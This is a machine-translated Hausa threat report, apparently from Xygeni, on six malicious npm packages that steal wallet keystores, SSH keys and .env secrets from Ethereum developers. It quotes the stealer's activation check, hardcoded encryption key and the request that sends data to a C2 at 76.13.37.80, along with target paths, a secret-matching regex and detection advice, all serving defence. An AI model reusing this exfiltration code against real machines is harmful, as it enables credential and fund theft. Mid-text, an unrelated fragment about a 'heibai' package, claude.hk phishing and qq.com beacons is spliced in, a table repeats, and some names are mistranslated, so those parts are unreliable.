TL, DR
A ranar 6 ga Mayu, 2026, wani mai buga npm guda ɗaya, namikazesarada010206, sun tura fakiti shida masu cutarwa waɗanda ke kai hari ga yanayin halittu na masu haɓaka Ethereum, Solidity, da DeFi.
Kunshin, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, Da kuma web3-utils-core, an yi amfani da sunaye masu kyau waɗanda aka tsara don kama da ɗakunan karatu na taimako don kayan aikin Web3 masu shahara.
Duk fakitin guda shida sun ƙunshi iri ɗaya telemetry.js fayil. Fayil ɗin yayi kama da byte a cikin rukunin, tare da SHA-256:
Malware ɗin ba ya aiki a lokacin shigarwa. Babu preinstall or postinstall ƙugiya. Madadin haka, yana kunnawa lokacin da aka shigo da kunshin ta hanyar require().
Wannan bayanin yana da muhimmanci.
Tsarin dashen yana jira har sai mai haɓaka ya yi amfani da fakitin. Sannan yana duba ko wurin aiki yana kama da ainihin yanayin ci gaban Ethereum / Solidity. Yana neman maɓallan Alchemy ko Infura, maɓallan sirri, mnemonics, maɓallan deployer, ko kuma kundin adireshi na Foundry na gida.
Idan mai masaukin ya dace, mai satar zai tattara maɓallan sirri na SSH, maɓallan walat na Foundry / Geth / Brownie, .env* fayiloli, da kuma masu canjin yanayi masu mahimmanci. Yana ɓoye fakitin tare da AES-256-GCM ta amfani da kalmar sirri mai lamba kuma yana fitar da shi zuwa ƙarshen IPv4 C2 mara tushe tare da kashe tabbatarwar TLS.
Tsarin Gargaɗin Farko na Malware na Xygeni (MEW) ya tabbatar da cewa dukkan fakitin guda shida suna da lahani. Ana jiran rahoton cire rajistar npm.
Ƙungiyar: Fakiti Shida, Mai Bugawa Ɗaya
Asusun mai wallafawa namikazesarada010206 an haɗa shi da adireshin Gmail da ba a tabbatar ba namikazesarada010206@gmail.com.
Yaƙin neman zaɓen ya bayyana yayin da aka buga wallafe-wallafe na kwana ɗaya a ranar 6 ga Mayu, 2026. Duk fakitin guda shida an buga su kamar haka 1.0.0, ba shi da wani dogaro da lokacin gudu, kuma an aika fayiloli uku kawai:
package.json index.js telemetry.js Sun kuma ayyana ma'ajiyar tushen iri ɗaya:
https://github.com/harunosakura030303-maker/evmchain-config Na'urorin daukar hoto na MEW sun kama fakiti uku na farko a farkon bugawa. Sauran ukun an yi musu alama da ƙarfi bayan nazarin bayanan mai sharhi kan bayanin martabar npm na mawallafin. A da, sun yi kama da byte iri ɗaya. telemetry.js An tabbatar da cewa an rufe su a matsayin masu mugunta saboda daidaito.
| Package | version | npm An buga | Tikitin MEW | hukunci |
|---|---|---|---|---|
| viem-core | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Mal |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | Mal |
| hardhat-core-utils | 1.0.0 | 2026-05-06 | #51051 | Mal |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | Mugunta, ta hanyar daidaito |
| kayan aikin gini | 1.0.0 | 2026-05-06 | #51071 | Mugunta, ta hanyar daidaito |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | Mugunta, ta hanyar daidaito |
Tsarin sanya suna yana da sauƙi amma yana da tasiri.
Waɗannan fakitin ba sa kwaikwayon ainihin sunayen da ke sama. Madadin haka, suna amfani da ƙarin kalmomi masu amfani kamar -core, -utils, Da kuma -utils-coreWannan yana sa su yi kama da ɗakunan karatu na abokan hulɗa wanda mai haɓaka zai yi tsammanin gani kusa da kayan aikin Web3.
| Kunshin Mugunta | Halaltaccen Manufa |
|---|---|
| viem-core | viem, sanannen abokin ciniki na Ethereum TypeScript |
| viem-utils-core | viem |
| hardhat-core-utils | hardhat, wani babban yanayi na ci gaban Solidity |
| evm-utils | Tsarin suna na kayan aikin EVM na gama gari |
| kayan aikin gini | masana'antar ma'adinai, wani kayan aiki mai ƙarfi |
| web3-utils-core | web3-utils, masu taimakawa Web3.js |
Wannan shine tsarin "ƙarin kunshin": ba "Ni ne ainihin kunshin ba," amma "Ina kama da mataimaki mai dacewa game da ainihin kunshin."
Ga masu haɓaka DeFi suna motsawa da sauri, hakan ya isa ya haifar da haɗari.
Me Ke Faruwa Idan An Shigo da Kunshin
Silsilar kai hari ƙarama ce, an yi niyya ne, kuma an mai da hankali ne kan yanayin ci gaban crypto.
Babu haɗin shigarwa. Madadin haka, kowane fakiti ya haɗa da index.js wanda ke fitar da aikin stub sannan ya ɗora wa ɓangaren telemetry mai cutarwa.
require('./telemetry').init(); Wannan yana nufin malware ɗin yana kunnawa a lokacin da aka fara shigo da shi.
Wannan yana da amfani ga mai kai hari a aikace. Yawancin na'urorin daukar hoto da akwatunan yadi suna mai da hankali kan halayen lokacin shigarwa. Wannan fakitin yana jira har sai mai haɓakawa, rubutun gini, gwajin kayan aiki, ko hanyar guduwa ta yi amfani da shi.
Ƙofar Kunnawa: Wuta Kawai akan Tashoshin Ma'aikata na Web3 na Gaskiya
Mafi mahimmancin ɓangaren dashen shine ƙofar kunnawa.
Malware yana duba masu canjin yanayi da aka saba samu akan injunan haɓaka Ethereum / Solidity:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Yana kuma duba ko an shigar da Foundry:
fs.existsSync(path.join(os.homedir(), '.foundry')) Idan babu ɗayan waɗannan sharuɗɗan, aikin zai dawo kuma ba zai yi komai ba.
Wannan yana sa kunshin ya yi shiru a yanayin nazarin gabaɗaya. Akwatin yashi ba tare da Foundry, Alchemy keys, Infura keys, private keys, ko menemonics na iya ganin wani abu mai kama da marar lahani ba.
A kan mai masaukin da ya dace, malware yana jira daƙiƙa 60 zuwa 90 kafin a tattara:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Jinkirin yana rage alaƙar da ke tsakanin shigo da kaya da fitar da ruwa. .unref() kira kuma yana barin tsarin mai masaukin baki ya fita yadda ya kamata idan an shigo da kunshin a cikin rubutun da ba zai daɗe ba.
Wannan ba dabi'a ce ta kwacewa da hayaniya ba. Sata ce da aka yi niyya don guje wa gudu sai dai idan yanayin masu haɓaka ya cancanci sata daga ciki.
Abin da Mai Sata Ya Tara
Da zarar ƙofar kunnawa ta wuce, malware ɗin yana tattarawa daga majiyoyin da suka fi muhimmanci a cikin haɓaka Web3: maɓallan sirri, shagunan maɓallan walat, takardun shaidar turawa, sirrin girgije, alamun npm, da kuma tsarin aikin gida.
| source | Abin da Aka Tara |
|---|---|
| tsari.env | Duk wani canji mai daidaitawa /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Fayilolin da ke ɗauke da PRIVATE KEY ko BEGIN OPENSSH, gami da cikakken abun cikin fayil |
| ~/.kayayyakin gini/maɓallan kaya/* | Fayilolin keystore na Foundry walat |
| ~/.ethereum/keystore/* | Fayilolin keystore na Geth walat |
| ~/.brownie/asusun/* | Fayil ɗin maɓallan Brownie walat |
| ${cwd}/.env | Cikakken abun cikin fayil |
| ${cwd}/.env.local | Cikakken abun cikin fayil |
| ${cwd}/.env.production | Cikakken abun cikin fayil |
| ${cwd}/.env.development | Cikakken abun cikin fayil |
| sunan mai masaukin baki () | Bayanan bayanai na mai masaukin baki |
| crypto.bazuwarUUID() | Mai gano wanda aka zalunta/zaman |
| Kwanan wata.yanzu() | Tambarin lokacin tattarawa |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com Alamun ATTA sune:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Ba mu iya tabbatar da ko na'urar tantancewa ta mai aiki ce ko kuma wata hanyar samun kuɗi daban. Alamun ATTA iri ɗaya ne a cikin samfuran biyu da muka bincika.
Rukunin B: heibai
claude.hk OAuth Phishing + ANTHROPIC_BASE_URL Satar Kuɗi
Samfurin ranar 1 ga Afrilu shine babban ɓangaren kamfen ɗin da ya fi kowanne muni.
heibai:2.1.88-claude.hk-4 ne ya wallafa wuguoqiangvip28, wani asusu da aka ƙirƙira a ranar 7 ga Yuni, 2025. Kunshin ya bayyana kansa a fili bisa ga doka 2.1.88 Sakin ɗan adam.
Ba ya damu da CA-cert MITM ba. Madadin haka, yana ƙarya ga mai amfani game da ƙarshen OAuth.
Karin abubuwa marasa kyau da aka yi a kan tushen Claude Code da aka fallasa sun hada da:
| source | Abin da Aka Tara |
|---|---|
| tsari.env | Duk wani canji mai daidaitawa /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Fayilolin da ke ɗauke da PRIVATE KEY ko BEGIN OPENSSH, gami da cikakken abun cikin fayil |
| ~/.kayayyakin gini/maɓallan kaya/* | Fayilolin keystore na Foundry walat |
| ~/.ethereum/keystore/* | Fayilolin keystore na Geth walat |
| ~/.brownie/asusun/* | Fayil ɗin maɓallan Brownie walat |
| ${cwd}/.env | Cikakken abun cikin fayil |
| ${cwd}/.env.local | Cikakken abun cikin fayil |
| ${cwd}/.env.production | Cikakken abun cikin fayil |
| ${cwd}/.env.development | Cikakken abun cikin fayil |
| sunan mai masaukin baki () | Bayanan bayanai na mai masaukin baki |
| crypto.bazuwarUUID() | Mai gano wanda aka zalunta/zaman |
| Kwanan wata.yanzu() | Tambarin lokacin tattarawa |
Jerin abubuwan da aka nufa yana da matuƙar takamaiman bayani. Wannan ba satar burauza ba ce ta gama gari ko kuma rugujewar takardar shaidar gama gari. An nufa ne ga masu haɓaka software waɗanda ke ginawa, gwadawa, tura su, ko gudanar da aikace-aikacen Ethereum.
Haɗa maɓallan Foundry, Geth, da Brownie yana da matuƙar muhimmanci. Waɗannan fayiloli na iya wakiltar samun dama kai tsaye zuwa walat ko asalin tura su. Idan maharin zai iya haɗa su da kalmomin shiga, abubuwan tunawa, ko sirrin muhalli, za su iya ɗaukar kuɗi, yin kwaikwayon masu tura su, ko kuma yin sulhu da ayyukan kwangila masu wayo.
Ƙirƙirar Bayani Kafin Fitarwa
Malware yana ɓoye bayanan da aka tattara kafin a aika su.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Kalmar sirri mai lamba mai lamba ita ce:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d An naɗe nauyin ƙarshe kamar JSON:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Ƙirƙirar bayanai ba ta sa malware ya ci gaba da bunkasa da kansa ba. Duk da haka, yana sa binciken hanyar sadarwa ya zama da wahala. Mai tsaron gida wanda ke kallon fitowar zai ga nauyin JSON, amma ba maɓallan da aka sace, fayilolin walat, ko .env abubuwan da ke ciki ba tare da kalmar sirri mai lamba da kuma dabarun warwarewa ba.
Fitarwa zuwa IPv4 C2 mara kyau
Hanyar fitar da ruwa an yi mata tsari mai tsauri:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Malware yana aika bayanai zuwa:
https://76.13.37.80:8443/api/v1/telemetry Cikakkun bayanai guda biyu sun bayyana.
Da farko, C2 adireshin IPv4 ne kawai ba na yanki ba. Wannan yana kawar da buƙatar yin rijistar yanki kuma yana guje wa wasu gano tushen yanki.
Na biyu, tabbatar da TLS yana kashewa idan:
rejectUnauthorized: false Wannan yana bawa malware damar karɓar kowace takardar shaida, gami da takaddun shaida da aka sanya wa hannu. A wata ma'anar, maharin yana samun jigilar bayanai ba tare da buƙatar takardar shaidar jama'a mai inganci ba.
Babu wata dabara ta sake gwadawa kuma babu mai masaukin baki. Ana haɗiye kurakurai a hankali. Wannan yana sa kunshin ya yi shiru idan C2 ba ya aiki a layi ko kuma ba a iya isa gare shi ba.
Me Yasa Wannan Gangamin Yafi Muhimmanci
Yawancin fakitin npm masu cutarwa waɗanda aka yi niyya don masu haɓakawa su bi manyan takaddun shaida: alamun npm, maɓallan AWS, alamun GitHub, ko .npmrc fayiloli.
Wannan kamfen ɗin yana rage abin da ake nema.
Yana neman alamun cewa na'urar ta kamfanin Ethereum ko Solidity ce. Sannan yana jawo ainihin kadarorin da ke da mahimmanci a wannan yanayin: shagunan maɓallan walat, maɓallan sirri, abubuwan tunawa, maɓallan deployer, .env fayiloli, da maɓallan SSH.
Wannan ya sa kamfen ɗin ya fi haɗari ga ƙungiyoyin Web3 fiye da satar npm na yau da kullun.
Nasarar kamuwa da cuta zai iya bayyana:
- Wallet ɗin turawa
- Maɓallan gudanarwa na kwangila mai wayo
- Maɓallan mai bada RPC
- Bayanan shigar da girgije
- alamun bugawa na npm
- Samun damar SSH zuwa ga mai haɓakawa ko kayan aikin ginawa
- An adana sirrin aikin a cikin
.envfiles - Maɓallan walat na Foundry, Geth, ko Brownie
Sunayen fakitin kuma suna nuna ingantaccen injiniyan zamantakewa. Suna yin niyya ga yanayin mahaliccin Web3 ta hanyar sunayen kayan aiki da aka saba da su: viem, hardhat, foundry, evm, Da kuma web3.
Ba sai ɗan wasan kwaikwayo ya yi wa ainihin ayyukan kwaskwarima ba. Suna buƙatar mai haɓaka kayan aiki kawai don shigar da abin da ya yi kama da kunshin abokin aiki mai ma'ana.
Alamomin Sasantawa da Ganowa
| Fakiti da Mai Bugawa | |
|---|---|
| Field | darajar |
| mai bugawa npm | namikazesarada010206 |
| Imel ɗin mai wallafawa | namikazesarada010206@gmail.com |
| An tabbatar da imel | A'a |
| SCM tabbatar | A'a |
| Maki mai suna | 1.0 |
| Pakete | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| versions | Duk 1.0.0 |
| Ma'ajiyar Tushe | https://github.com/harunosakura030303-maker/evmchain-config |
| An tabbatar da aikata mugunta | Duk fakiti shida |
| Network | |
|---|---|
| type | darajar |
| ƙarshen C2 | https://76.13.37.80:8443/api/v1/telemetry |
| C2 IP | 76.13.37.80 |
| Tashar C2 | 8443/tcp |
| Halayyar TLS | rejectUnified: ƙarya |
| Tsarin nauyin kaya | {"v":2,"iv": "d": "t": } |
| Fayiloli da Hashes | |
|---|---|
| type | darajar |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Tsarin fakitin | package.json, index.js, telemetry.js |
| Adadin fayiloli | 3 |
| Kimanin jimlar girman | 3.4 KB |
Siginar kunnawa
Malware yana duba waɗannan masu canjin yanayi:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Yana kuma duba:
~/.foundry/ Hanyoyin Mai masaukin baki da aka yi niyya
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Regex Collection
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Bayanan Ganowa
Dokoki da dama sun shafi wannan kamfen ba tare da buƙatar cikakken nazarin ɗabi'u ba.
Da farko, duba fayilolin kulle don ganin sunayen fakitin da ba su da kyau guda shida:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Duk wani wasa da ya dace a ciki package-lock.json, yarn.lock, pnpm-lock.yaml, ko node_modules ya kamata a ɗauki tarihi a matsayin wani lamari mai tsanani.
Na biyu, saka idanu don Node.js yana karanta hanyoyin maɓallan walat:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Wannan ba kasafai ake samun halayya ta halal ga kunshin da aka shigo da shi azaman mai taimako ba. Yana da matukar shakku musamman idan aka biyo baya da ayyukan hanyar sadarwa ta waje.
Na uku, toshe ko faɗakar da kai game da haɗin HTTPS zuwa:
76.13.37.80:8443 Musamman idan hanyar neman ita ce:
/api/v1/telemetry Na huɗu, nemi fakitin npm waɗanda suka haɗa waɗannan halaye:
- Sabon mai wallafawa ko wanda ba shi da suna
- Asusun Gmail mara tabbaci
- Sunan fakitin da ke kusa da Web3
- Babu wani tarihin adana bayanai mai mahimmanci
- Tsarin ƙaramin kunshin
index.jswanda ke loda fayil ɗin telemetry ko mataimaki- Babu dogaro da lokacin gudu
- Tarin yanayi mai laushi-canzawa
- Samun damar shagon maɓallan walat
Wannan tsari ya fi amfani fiye da IOC guda ɗaya domin fakitin na gaba na iya canza adireshin IP amma yana riƙe da irin wannan dabarar manufa.
Jerin Abubuwan Da Suka Faru Tsakanin Masu Ba da Shawara
Idan mai haɓaka ya yi amfani da ɗaya daga cikin fakiti shida kuma yanayin wurin ya yi daidai da ƙofar kunnawa, ɗauki wurin aiki a matsayin wanda aka lalata.
Wannan ya haɗa da injina da aka sanya Foundry, maɓallan Alchemy ko Infura a cikin muhalli, maɓallan sirri, maɓallan tunawa, ko maɓallan deployer.
Amsar da aka ba da shawarar:
- Cire haɗin mai masaukin baki daga hanyar sadarwa.
- Tsare
node_modules, fayilolin kullewa, tarihin harsashi, da kuma rajistan ayyukan bincike masu dacewa. - Juya kowane maɓalli na SSH a ƙarƙashin
~/.ssh/. - Juya maɓallan walat ga kowane maɓalli a ƙarƙashin
~/.foundry,~/.ethereum, Da kuma~/.brownie. - Matsar da kuɗi zuwa sabbin walat.
- Juya duk wani sirri da aka adana a ciki
.env*fayiloli a cikin ma'ajiyar bayanai, mai haɓaka aikin ya yi aiki a ciki. - Juya sirrin muhalli da suka dace da tsarin tattara bayanai, gami da maɓallan AWS, alamun npm, tura alamun, maɓallan API, maɓallan sirri, iri, da kuma abubuwan tunawa.
- Girgije na dubawa, npm, GitHub, mai samar da RPC, da kuma ayyukan blockchain tun lokacin da aka fara shigar da fakitin.
- Sake ɗaukar hoton wurin aiki kafin sake amfani da shi.
Abin da Masu Kare Ya Kamata Su Ɗauka
Wannan kamfen ɗin yana nuna yadda rubutun npm ke canzawa dangane da yanayin halittu masu daraja na masu haɓaka.
Jarumin bai buƙatar juriya ba. Ba sa buƙatar ɓoye sirrinsu. Ba ma buƙatar aiwatar da aikin lokacin shigarwa ba.
Madadin haka, sun dogara da abubuwa uku:
- Sunayen fakitin Web3 masu yuwuwa
- Kunnawa kawai akan injunan haɓaka crypto na gaske
- Satar fayiloli kai tsaye da sirrin da suka fi muhimmanci ga masu haɓaka Ethereum
Wannan yana sa kamfen ɗin ya zama mai sauƙin rasawa a cikin babban bincike kuma yana da haɗari idan ya sauka a cikin yanayi mai kyau.
Ga ƙungiyoyin Web3, darasin a bayyane yake: a ɗauki sunayen masu dogaro da kai a matsayin wani ɓangare na tsarin barazanar ku. Kunshin da ya yi kama da mai taimako mara lahani har yanzu zai iya zama hanya mafi guntu ta warware matsalar walat.
An bayar da rahoto ga rajistar npm. Za mu sabunta wannan sakon idan aka cire asusun mawallafi da fakiti.




